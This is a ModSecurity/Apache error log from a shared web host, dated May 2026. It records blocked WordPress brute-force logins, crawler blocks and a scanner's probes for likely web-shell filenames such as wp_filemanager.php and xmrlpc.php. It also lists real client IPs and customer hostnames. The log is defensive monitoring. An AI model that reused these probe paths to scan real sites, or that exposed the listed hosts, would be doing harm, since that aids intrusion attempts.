[Tue May 26 16:59:04.242678 2026] [security2:error] [pid 839808:tid 840065] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD_pqtwAfohijxAqhpJAAAAYc"]
[Tue May 26 16:59:04.685053 2026] [security2:error] [pid 839808:tid 839882] [remote 103.11.102.106:50622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWEAJqtwAfohijxAqhpVAABaEc"]
[Tue May 26 16:59:06.661699 2026] [security2:error] [pid 839808:tid 840052] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEAJqtwAfohijxAqhpXwAAAXo"]
[Tue May 26 16:59:07.868238 2026] [security2:error] [pid 839808:tid 839993] [client 107.175.5.36:9240] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/wp-content/plugins/worker/readme.txt"] [unique_id "ahWEA5qtwAfohijxAqhpsgAAAT8"], referer: https://www.google.com/
[Tue May 26 16:59:08.141055 2026] [security2:error] [pid 839808:tid 840023] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEApqtwAfohijxAqhpjAAAAV0"]
[Tue May 26 16:59:08.312290 2026] [security2:error] [pid 839808:tid 839967] [client 107.175.5.36:1935] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/wp-content/plugins/mainwp-child/readme.txt"] [unique_id "ahWEBJqtwAfohijxAqhpuwAAASU"], referer: https://www.google.com/
[Tue May 26 16:59:08.755965 2026] [security2:error] [pid 839808:tid 840044] [client 107.175.5.36:37745] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/wp-content/plugins/iwp-client/readme.txt"] [unique_id "ahWEBJqtwAfohijxAqhpwwAAAXI"], referer: https://www.google.com/
[Tue May 26 16:59:09.198786 2026] [security2:error] [pid 839808:tid 840060] [client 107.175.5.36:55218] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/wp-content/plugins/vaultpress/readme.txt"] [unique_id "ahWEBZqtwAfohijxAqhp0wAAAYI"], referer: https://www.google.com/
[Tue May 26 16:59:10.331977 2026] [security2:error] [pid 839808:tid 840059] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEBZqtwAfohijxAqhpzwAAAYE"]
[Tue May 26 16:59:12.285493 2026] [security2:error] [pid 839808:tid 839961] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEBpqtwAfohijxAqhp9gAAAR8"]
[Tue May 26 16:59:12.695677 2026] [security2:error] [pid 839808:tid 840031] [client 146.174.163.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEB5qtwAfohijxAqhp-QAAAWU"]
[Tue May 26 16:59:13.002128 2026] [core:error] [pid 839808:tid 840062] [client 74.7.241.141:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:59:13.002156 2026] [core:error] [pid 839808:tid 840062] [client 74.7.241.141:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:59:13.002294 2026] [security2:error] [pid 839808:tid 840062] [client 74.7.241.141:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "webmail.digentasmartsn.com"] [uri "/___proxy_subdomain_webmail/index.php"] [unique_id "ahWECJqtwAfohijxAqhqIgAAAYQ"]
[Tue May 26 16:59:13.002851 2026] [security2:error] [pid 839808:tid 840024] [client 74.7.241.141:50856] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "webmail.digentasmartsn.com"] [uri "/___proxy_subdomain_webmail/robots.txt"] [unique_id "ahWECJqtwAfohijxAqhqIAABXmU"]
[Tue May 26 16:59:14.311568 2026] [security2:error] [pid 839808:tid 839982] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWECJqtwAfohijxAqhqGwAAATQ"]
[Tue May 26 16:59:15.872579 2026] [security2:error] [pid 839808:tid 840061] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWECpqtwAfohijxAqhqPgAAAYM"]
[Tue May 26 16:59:16.114379 2026] [security2:error] [pid 839808:tid 839923] [remote 109.205.180.55:56522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahWEC5qtwAfohijxAqhqVQABf3A"]
[Tue May 26 16:59:19.110977 2026] [security2:error] [pid 839808:tid 840043] [client 66.249.64.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWED5qtwAfohijxAqhqlgAAAXE"]
[Tue May 26 16:59:19.111353 2026] [security2:error] [pid 839808:tid 840007] [client 66.249.64.110:36675] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWEDpqtwAfohijxAqhqlAAAAU0"]
[Tue May 26 16:59:19.460801 2026] [security2:error] [pid 839808:tid 839941] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEDJqtwAfohijxAqhqbwAAAQs"]
[Tue May 26 16:59:20.224505 2026] [security2:error] [pid 839808:tid 839952] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEDpqtwAfohijxAqhqjAAAARY"]
[Tue May 26 16:59:21.408408 2026] [security2:error] [pid 839808:tid 839876] [remote 209.42.18.223:56234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWEEZqtwAfohijxAqhqvgABQUE"]
[Tue May 26 16:59:22.585503 2026] [security2:error] [pid 839808:tid 839958] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEEJqtwAfohijxAqhqsAAAARw"]
[Tue May 26 16:59:22.587080 2026] [security2:error] [pid 839808:tid 839976] [client 114.119.132.18:55729] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/blog/category/papilionaceous/"] [unique_id "ahWEEpqtwAfohijxAqhq0AAAAS4"], referer: http://rohiniventures.com/blog/category/parent-category
[Tue May 26 16:59:23.979327 2026] [security2:error] [pid 839808:tid 839988] [client 114.119.129.218:63939] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/upload/banner/"] [unique_id "ahWEE5qtwAfohijxAqhq6QAAATo"], referer: https://www.ucdc.co.in/upload/banner/?C=D%3BO%3DA
[Tue May 26 16:59:24.149436 2026] [security2:error] [pid 839808:tid 840028] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEEpqtwAfohijxAqhqzwAAAWI"]
[Tue May 26 16:59:25.942828 2026] [security2:error] [pid 839808:tid 839823] [remote 74.7.241.58:46122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWEFZqtwAfohijxAqhrDwABKww"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:59:26.051925 2026] [security2:error] [pid 839808:tid 839953] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEFJqtwAfohijxAqhq9QAAARc"]
[Tue May 26 16:59:27.022941 2026] [security2:error] [pid 839808:tid 839990] [client 114.119.135.136:53625] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/1hfq/how-to-manually-move-a-power-seat-ford-f250.html"] [unique_id "ahWEF5qtwAfohijxAqhrIgAAATw"], referer: http://whitesun.in/1hfq/how-to-manually-move-a-power-seat-ford-f250.html
[Tue May 26 16:59:27.737586 2026] [security2:error] [pid 839808:tid 839947] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEFpqtwAfohijxAqhrFgAAARE"]
[Tue May 26 16:59:29.570925 2026] [security2:error] [pid 839808:tid 839989] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEGJqtwAfohijxAqhrPQAAATs"]
[Tue May 26 16:59:30.082711 2026] [security2:error] [pid 839808:tid 840063] [client 185.191.171.14:21810] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWEGpqtwAfohijxAqhrXwAAAYU"]
[Tue May 26 16:59:30.082848 2026] [security2:error] [pid 839808:tid 840063] [client 185.191.171.14:21810] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWEGpqtwAfohijxAqhrXwAAAYU"]
[Tue May 26 16:59:30.412975 2026] [security2:error] [pid 839808:tid 839967] [client 85.208.96.204:63262] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWEGpqtwAfohijxAqhrbQAAASU"]
[Tue May 26 16:59:30.413134 2026] [security2:error] [pid 839808:tid 839967] [client 85.208.96.204:63262] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWEGpqtwAfohijxAqhrbQAAASU"]
[Tue May 26 16:59:31.526974 2026] [security2:error] [pid 839808:tid 839984] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEGpqtwAfohijxAqhrZgAAATY"]
[Tue May 26 16:59:33.191481 2026] [security2:error] [pid 839808:tid 840011] [client 20.104.227.76:51232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWEHZqtwAfohijxAqhrowAAAVE"]
[Tue May 26 16:59:33.191680 2026] [security2:error] [pid 839808:tid 840011] [client 20.104.227.76:51232] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWEHZqtwAfohijxAqhrowAAAVE"]
[Tue May 26 16:59:33.423554 2026] [security2:error] [pid 839808:tid 840016] [client 20.104.227.76:50717] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/core/init.php"] [unique_id "ahWEHZqtwAfohijxAqhrqgAAAVY"]
[Tue May 26 16:59:33.423744 2026] [security2:error] [pid 839808:tid 840016] [client 20.104.227.76:50717] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/core/init.php"] [unique_id "ahWEHZqtwAfohijxAqhrqgAAAVY"]
[Tue May 26 16:59:33.502430 2026] [security2:error] [pid 839808:tid 840056] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEHJqtwAfohijxAqhrkAAAAX4"]
[Tue May 26 16:59:33.611645 2026] [security2:error] [pid 839808:tid 840001] [client 20.104.227.76:51203] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/aa.php"] [unique_id "ahWEHZqtwAfohijxAqhrrwAAAUc"]
[Tue May 26 16:59:33.611781 2026] [security2:error] [pid 839808:tid 840001] [client 20.104.227.76:51203] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/aa.php"] [unique_id "ahWEHZqtwAfohijxAqhrrwAAAUc"]
[Tue May 26 16:59:33.804939 2026] [security2:error] [pid 839808:tid 840064] [client 20.104.227.76:51786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/xmrlpc.php"] [unique_id "ahWEHZqtwAfohijxAqhrsAAAAYY"]
[Tue May 26 16:59:33.805048 2026] [security2:error] [pid 839808:tid 840064] [client 20.104.227.76:51786] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/xmrlpc.php"] [unique_id "ahWEHZqtwAfohijxAqhrsAAAAYY"]
[Tue May 26 16:59:34.014328 2026] [security2:error] [pid 839808:tid 840003] [client 20.104.227.76:51817] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/class.php"] [unique_id "ahWEHpqtwAfohijxAqhrswAAAUk"]
[Tue May 26 16:59:34.014479 2026] [security2:error] [pid 839808:tid 840003] [client 20.104.227.76:51817] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/class.php"] [unique_id "ahWEHpqtwAfohijxAqhrswAAAUk"]
[Tue May 26 16:59:34.171296 2026] [security2:error] [pid 839808:tid 840060] [client 20.104.227.76:51831] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/goods.php"] [unique_id "ahWEHpqtwAfohijxAqhrtwAAAYI"]
[Tue May 26 16:59:34.171411 2026] [security2:error] [pid 839808:tid 840060] [client 20.104.227.76:51831] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/goods.php"] [unique_id "ahWEHpqtwAfohijxAqhrtwAAAYI"]
[Tue May 26 16:59:34.341075 2026] [security2:error] [pid 839808:tid 839958] [client 20.104.227.76:51731] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/info.php"] [unique_id "ahWEHpqtwAfohijxAqhrwAAAARw"]
[Tue May 26 16:59:34.341215 2026] [security2:error] [pid 839808:tid 839958] [client 20.104.227.76:51731] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/info.php"] [unique_id "ahWEHpqtwAfohijxAqhrwAAAARw"]
[Tue May 26 16:59:34.536978 2026] [security2:error] [pid 839808:tid 840048] [client 20.104.227.76:51321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/as.php"] [unique_id "ahWEHpqtwAfohijxAqhrxAAAAXY"]
[Tue May 26 16:59:34.537095 2026] [security2:error] [pid 839808:tid 840048] [client 20.104.227.76:51321] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/as.php"] [unique_id "ahWEHpqtwAfohijxAqhrxAAAAXY"]
[Tue May 26 16:59:34.726825 2026] [security2:error] [pid 839808:tid 839962] [client 20.104.227.76:51281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/bb.php"] [unique_id "ahWEHpqtwAfohijxAqhryQAAASA"]
[Tue May 26 16:59:34.726940 2026] [security2:error] [pid 839808:tid 839962] [client 20.104.227.76:51281] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/bb.php"] [unique_id "ahWEHpqtwAfohijxAqhryQAAASA"]
[Tue May 26 16:59:34.905770 2026] [security2:error] [pid 839808:tid 839972] [client 20.104.227.76:51317] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/about.php"] [unique_id "ahWEHpqtwAfohijxAqhrygAAASo"]
[Tue May 26 16:59:34.905954 2026] [security2:error] [pid 839808:tid 839972] [client 20.104.227.76:51317] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/about.php"] [unique_id "ahWEHpqtwAfohijxAqhrygAAASo"]
[Tue May 26 16:59:35.080647 2026] [security2:error] [pid 839808:tid 840038] [client 20.104.227.76:51211] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/222.php"] [unique_id "ahWEH5qtwAfohijxAqhrzwAAAWw"]
[Tue May 26 16:59:35.080747 2026] [security2:error] [pid 839808:tid 840038] [client 20.104.227.76:51211] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/222.php"] [unique_id "ahWEH5qtwAfohijxAqhrzwAAAWw"]
[Tue May 26 16:59:35.129037 2026] [security2:error] [pid 839808:tid 839941] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEHpqtwAfohijxAqhrvwAAAQs"]
[Tue May 26 16:59:35.296451 2026] [security2:error] [pid 839808:tid 840006] [client 20.104.227.76:51725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/test1.php"] [unique_id "ahWEH5qtwAfohijxAqhr0QAAAUw"]
